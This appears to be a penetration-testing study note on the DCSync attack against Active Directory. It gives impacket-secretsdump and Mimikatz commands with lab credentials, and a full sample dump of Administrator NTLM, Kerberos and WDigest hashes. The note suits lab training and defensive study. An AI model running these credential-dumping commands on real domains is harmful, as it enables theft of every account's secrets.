DCSync Attack
Another way to achieve persistence in an Active Directory infrastructure is to steal the password hashes for all administrative users in the domain.
To do this, we could move laterally to the domain controller and run Mimikatz to dump the password hash of every user. We could also steal a copy of the NTDS.dit database file, which is a copy of all Active Directory accounts stored on the hard drive, similar to the SAM database used for local accounts.
While these methods might work fine, they leave an access trail and may require us to upload tools. An alternative is to abuse AD functionality itself to capture hashes remotely from a workstation.
Luckily for us, the domain controller receiving a request for an update does not verify that the request came from a known domain controller, but only that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user who is a member of the Domain Admins group, it will succeed.
Impacket-secretsdump
1
impacket-secretsdump htb.local/mrlky:'Football#7'@10.10.10.103
Examples: Sizzle
Mimikatz
Upload the mimikatz executable to the machine first, then execute:
1
2
3
privilege::debug
token::elevate
lsadump::dcsync /all /csv
Mimikatz Administrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'corp.com' will be the domain
[DC] 'DC01.corp.com' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
\*\* SAM ACCOUNT \*\*
SAM Username : Administrator
User Principal Name : Administrator@corp.com
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 05/02/2018 19.33.10
Object Security ID : S-1-5-21-1602875587-2787523311-2599479668-500
Object Relative ID : 500
Credentials:
Hash NTLM: e2b475c11da2a0748290d87aa966c327
ntlm- 0: e2b475c11da2a0748290d87aa966c327
lm - 0: 913b84377b5cb6d210ca519826e7b5f5
Supplemental Credentials:
\* Primary:NTLM-Strong-NTOWF \*
Random Value : f62e88f00dff79bc79f8bad31b3ffa7d
\* Primary:Kerberos-Newer-Keys \*
Default Salt : CORP.COMAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096): 4c6300b908619dc7a0788da81ae5903c2c97c5160d0d9bed85cfd5af02dabf01
aes128_hmac (4096): 85b66d5482fc19858dadd07f1d9b818a
des_cbc_md5 (4096): 021c6df8bf07834a
\* Primary:Kerberos \*
Default Salt : CORP.COMAdministrator
Credentials
des_cbc_md5 : 021c6df8bf07834a
\* Packages \*
NTLM-Strong-NTOWF
\* Primary:WDigest \*
01 4ec8821bb09675db670e66998d2161bf
02 3c9be2ff39c36efd2f84b63aa656d09a
03 2cf1734936287692601b7e36fc01e2d7
04 4ec8821bb09675db670e66998d2161bf
05 3c9be2ff39c36efd2f84b63aa656d09a
...
Examples: [[Sauna#^dd4d7f]] . Finally you can use the Hash NTLM to login with Pass The Hash technique.